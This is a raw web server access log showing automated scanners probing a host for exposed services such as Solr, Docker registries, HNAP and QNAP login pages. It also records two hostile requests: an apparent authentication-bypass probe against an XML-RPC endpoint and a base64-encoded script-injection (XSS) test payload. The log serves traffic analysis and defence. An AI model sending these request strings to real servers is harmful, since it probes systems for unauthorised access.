77.90.153.48 - - [03/Jul/2025:15:19:22 +0200] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/102.0 Safari/537.36"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET /odinhttpcall1751548311 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.22.64.151 - - [03/Jul/2025:15:19:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.232.121.101 - - [03/Jul/2025:15:19:34 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
206.81.29.108 - - [03/Jul/2025:15:19:34 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
46.101.112.141 - - [03/Jul/2025:15:19:34 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.227.163.149 - - [03/Jul/2025:15:19:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.227.163.149 - - [03/Jul/2025:15:19:34 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
167.99.251.122 - - [03/Jul/2025:15:19:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.89.16.251 - - [03/Jul/2025:15:19:34 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
167.99.251.122 - - [03/Jul/2025:15:19:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
206.81.29.108 - - [03/Jul/2025:15:19:34 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
159.223.35.160 - - [03/Jul/2025:15:19:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:15:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:15:20:25 +0200] "GET /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23 HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/108.0 Safari/537.36"
